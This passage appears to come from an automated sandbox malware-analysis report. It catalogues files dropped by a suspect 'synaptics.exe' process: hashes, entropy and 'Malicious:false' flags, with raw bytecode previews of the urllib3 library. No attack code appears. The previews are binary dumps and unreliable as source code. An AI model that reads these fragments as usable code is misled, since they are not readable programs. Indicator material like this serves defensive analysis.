                                                                                                                                                                                                            Preview:o..........g[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18201
                                                                                                                                                                                                            Entropy (8bit):5.491440687419283
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:HlCIl5+Qqvw7bm2+Pp0hTZp4tGwi5k43Y:HvgQqvwng+NZp8Of3Y
                                                                                                                                                                                                            MD5:57D85919D0CD4D22E2E1FA4BA7F03525
                                                                                                                                                                                                            SHA1:042FE05CC47D143265496A17206E21E3DA1BA7A2
                                                                                                                                                                                                            SHA-256:6A1B7D3893EA8F7424BF23C6F39E6393A8CD02D4C743E3A7DA058B2684C46542
                                                                                                                                                                                                            SHA-512:29D45786CF38E8DD30CAEF84998BAA140B658A28B3777ECE5CF195954CD7023668D81D23907325BD1E416A6E10CC18F21DC1043386DD6B9DD4D98A2F11A3CA79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33463
                                                                                                                                                                                                            Entropy (8bit):5.334996153883082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7uBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:9Gc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                            MD5:5D8BDA24798CD7DA2C19BB63618B2E07
                                                                                                                                                                                                            SHA1:A16BC40F63F9C842E96CBBCBD7C85E4DDF2AFF19
                                                                                                                                                                                                            SHA-256:97D25A797653BB1BD59C7F8EFCEBB6E44D1320B97F6876C8F52130A5AFD24C5D
                                                                                                                                                                                                            SHA-512:73B036602746F7E1C3B366A2A7C995E095CFCF417EC1B8AF9A84195A4F0BA894C666120C267D34B9F14DEEBC8E8071220A5963F0FA6313067DC8FB37B4CC9B4A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33463
                                                                                                                                                                                                            Entropy (8bit):5.334996153883082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7uBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:9Gc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                            MD5:5D8BDA24798CD7DA2C19BB63618B2E07
                                                                                                                                                                                                            SHA1:A16BC40F63F9C842E96CBBCBD7C85E4DDF2AFF19
                                                                                                                                                                                                            SHA-256:97D25A797653BB1BD59C7F8EFCEBB6E44D1320B97F6876C8F52130A5AFD24C5D
                                                                                                                                                                                                            SHA-512:73B036602746F7E1C3B366A2A7C995E095CFCF417EC1B8AF9A84195A4F0BA894C666120C267D34B9F14DEEBC8E8071220A5963F0FA6313067DC8FB37B4CC9B4A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                            Entropy (8bit):4.664349640552226
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/TTlllluleh/wZWewo5jDt+kiE2J5dj/a6iVWrzOXH+IOkcTgp:y/f/qeh/wv5jDwkn23h/a/Ar6XeR4
                                                                                                                                                                                                            MD5:98863F6B314A58FC7C2282217EF72B97
                                                                                                                                                                                                            SHA1:FF03FB5D1590F9E270283BEF8F9B135C5F8489BD
                                                                                                                                                                                                            SHA-256:0A14F9E4E6FB8E558DCE0A9CAC35DCA2B45A7EF27D3457B77BDC9438F219EE13
                                                                                                                                                                                                            SHA-512:989B9A48B80CC0DD03CF4EFD984ED7A69D622296B1EEFDB92BA87F9724ADE1A4EE66E7457F41C6F8CF6B51BB18A39559FAD672BE7226CEADBBB72FD14B3B62BC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6139
                                                                                                                                                                                                            Entropy (8bit):5.638888116290871
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:wq8bFojUEqiHSz83KWZMs7hTbWiTmC69iE245Zi81JQ3:L6VEqtVGbC9ipca3
                                                                                                                                                                                                            MD5:85E66EC9639F82905F9923AAC1E7EE69
                                                                                                                                                                                                            SHA1:3C770A8FCA23E67B2B144ACA9E2648CAF4FA77BC
                                                                                                                                                                                                            SHA-256:E21BD4489ECECB8F0D8CA3261F82A5FB13093CBE4DA71E2788290B4A4DFCFB90
                                                                                                                                                                                                            SHA-512:ACF0E91B0FFE15FAA0C6E2FC7E89384847EE2F3B11186867B435FE35997EDC2F387D0248F9CB3FBB71F6417682BBF077BD054D7647EE10D2AD39645FAF405BB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1415
                                                                                                                                                                                                            Entropy (8bit):5.4055190096671994
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:4hMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FmfGW92vbwFWHrb49msQWP7:1BdYLbX4DinRaauD9Hrb4mAP7
                                                                                                                                                                                                            MD5:F0A4547068FCACE9FEB787FB45B0D13C
                                                                                                                                                                                                            SHA1:F201DA54896C6C4CA9E25F5C41998CCC1613252A
                                                                                                                                                                                                            SHA-256:C815CF6C6DD2B6A3E071D058635C034ADD05558CCE890AD49BC01803A2729F28
                                                                                                                                                                                                            SHA-512:2FD80E31F7E5C4082252154AD600D996307E829CDDD0908A41BC54241F8BD8D2561F0E081E3837EFEEE29DA45F7591B32D95E334AB8B8EAC7315B64144D4A100
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c.............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2549
                                                                                                                                                                                                            Entropy (8bit):5.264022857723652
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:jPQG3rPSnqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:jzz/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                            MD5:E0D201BD6516E44F0BB85412DE263EA6
                                                                                                                                                                                                            SHA1:B35DA26F5F693FF6B87092DF2C023B8967C8AA33
                                                                                                                                                                                                            SHA-256:E08AFF66FFA2E8370932F20B84FB9FFDABE3504D1C9AE3D1039D1B4A7528D1BE
                                                                                                                                                                                                            SHA-512:70E1D98DEB7E57532383521A9A847B073FAC955F027802F161F1661A02211CEAE3908E57B22D6C55C8E0DDAE27BE3DBDB035625F6861DD14FE7D3C3F4F024CAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):958
                                                                                                                                                                                                            Entropy (8bit):5.344910343532263
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:gXJUVegJzYoyYhRYQZyihmLptrv2buqq9PXwfGL:gX3gJz2Y39Zyi0TrOaqq9Pkw
                                                                                                                                                                                                            MD5:53E421134BF9D717204316C71D1ACD8D
                                                                                                                                                                                                            SHA1:0ABF8040355B570DCA6FD5F5AE7F795D93FA3C9E
                                                                                                                                                                                                            SHA-256:7D72E743BA59125B693C9384160C3B4CA7C27309C8A8323B1DAB6A41CA550CE9
                                                                                                                                                                                                            SHA-512:05EB1BA363B8D969C0DFBA4004F6818CC607876ACCDAD3B37C56ED62A403689C7BA445EB92076D67945F15DAAD271E3F3D929DB5E4F8DAB0CF92D03D22CD400D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser......retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r ...r ....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3477
                                                                                                                                                                                                            Entropy (8bit):5.5498788301320054
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Ad8QkXnGzo+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:ckXh+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                                            MD5:AD072C46DADBF1BD33A67C91B1B01094
                                                                                                                                                                                                            SHA1:73D89317D4CACAD84C972FB51BE015F1C01A5919
                                                                                                                                                                                                            SHA-256:A531D925A9764FB92075E6F1F70AD6D9CC3AF17C271AA9353EB278AFF4FA89DA
                                                                                                                                                                                                            SHA-512:7B59853AE8A5823FCF21E6425A763D547A38FEF99125FE0FEC04F6793FCDBD80C2F7B679CE8B7D9E81AE558F7FF92B7FCD67A31E888C553788D0EEA3339CD8C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....TC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1088
                                                                                                                                                                                                            Entropy (8bit):5.404442071401463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:A/ZpGf5n/lIpWt84RzmQXvAFnT8adLRSfG7frY8lt6rn:Aut/Rt82m38apc8f7S
                                                                                                                                                                                                            MD5:870D302FDF3987872615D12191AEDBA3
                                                                                                                                                                                                            SHA1:2666C40F62B85C4BDC5EB18D659458ACA7E44A91
                                                                                                                                                                                                            SHA-256:6B1BC4787267276FF442B2FC564252A46840E109A03B841B363146903A03FD5A
                                                                                                                                                                                                            SHA-512:DB7DC0DE243A21F714343F58F8EAEAE65463A029AC1C9D62810FEC90EB5E66143B65F337E989FC8D72F4B88A89A56DE1AB2F65367E52DFA72BC659D1DC81F544
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6212
                                                                                                                                                                                                            Entropy (8bit):5.647296227132136
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Uj+t5xiDKV+DKYzQ2P7fRxa5jyGyT/aOMyjxMbsrHMCtkwTVvAJhK:bMKV+DKYzP7pxdCsxM4H/T5
                                                                                                                                                                                                            MD5:E0B5A3186A4F814D4C2BAB7BC06E9961
                                                                                                                                                                                                            SHA1:C6838256A61F9DE77F0BD6B3A3421C4AEA09777C
                                                                                                                                                                                                            SHA-256:D5B3D87653336C22B802E537B638FFE2387CF11D7B30E228307C2B04F35290D5
                                                                                                                                                                                                            SHA-512:26517915FEC108CB98F592D53E6E2F62E5FF2B4AD238CC210DD7D09834D48E31986D4A861250CF9DD33B64BDCDC8EC7505E2F84DD566EECD76E6BB9CC205C332
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.DELETEZ.CONNECT..GETZ.OPTIONSZ.TRACE..HEAD..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | N
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2344
                                                                                                                                                                                                            Entropy (8bit):5.385742032153854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Hmhh16e6JQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:86NGslvhaIds
                                                                                                                                                                                                            MD5:40CEDE068394D40DD48088DC8FEC4EF7
                                                                                                                                                                                                            SHA1:328F46C9B646C588B8281FAD491B4855173FC8A9
                                                                                                                                                                                                            SHA-256:BF187ADF3F06A338D3D44A1E581C1FDECC85AD8F7754F85720881CE7CF0EB3E5
                                                                                                                                                                                                            SHA-512:A49F839AB3BFAE82C31DC8392E139852C143FC79FBA6AADA8738EE48A424A1BCA88DDA29C57891D47292E7C574111EE722A1A1D17B5069CE86FD2CA659A26EB3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2344
                                                                                                                                                                                                            Entropy (8bit):5.385742032153854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Hmhh16e6JQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:86NGslvhaIds
                                                                                                                                                                                                            MD5:40CEDE068394D40DD48088DC8FEC4EF7
                                                                                                                                                                                                            SHA1:328F46C9B646C588B8281FAD491B4855173FC8A9
                                                                                                                                                                                                            SHA-256:BF187ADF3F06A338D3D44A1E581C1FDECC85AD8F7754F85720881CE7CF0EB3E5
                                                                                                                                                                                                            SHA-512:A49F839AB3BFAE82C31DC8392E139852C143FC79FBA6AADA8738EE48A424A1BCA88DDA29C57891D47292E7C574111EE722A1A1D17B5069CE86FD2CA659A26EB3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
